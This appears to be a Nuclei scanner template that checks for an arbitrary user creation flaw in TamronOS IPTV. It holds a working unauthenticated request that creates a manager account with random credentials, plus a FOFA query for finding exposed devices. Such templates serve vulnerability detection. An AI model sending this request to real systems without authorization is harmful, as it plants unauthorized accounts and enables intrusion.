42 lines
1.2 KiB
YAML
42 lines
1.2 KiB
YAML
id: tamronos-user-creation
|
|
|
|
info:
|
|
name: TamronOS IPTV - Arbitrary User Creation
|
|
author: pussycat0x
|
|
severity: high
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TamronOS%20IPTV%E7%B3%BB%E7%BB%9F%20submit%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="TamronOS-IPTV系统"
|
|
tags: tamronos,miconfig,iptv
|
|
variables:
|
|
username: "{{to_lower(rand_text_alphanumeric(6))}}"
|
|
password: "{{rand_text_alphanumeric(12)}}"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/manager/submit?group=1&username={{username}}&password={{password}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"suc":true'
|
|
- '"msg":"\u6210\u529f"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502203032da92f0c714ba9ce9e2703c6ab0edf615319e9a058d1070ce6867d3799aa0022100ca8c67797d2065f61885b921e59b35638e643d210afe55430f6ed71bafc37416:922c64590222798bb761d5b6d8e72950
|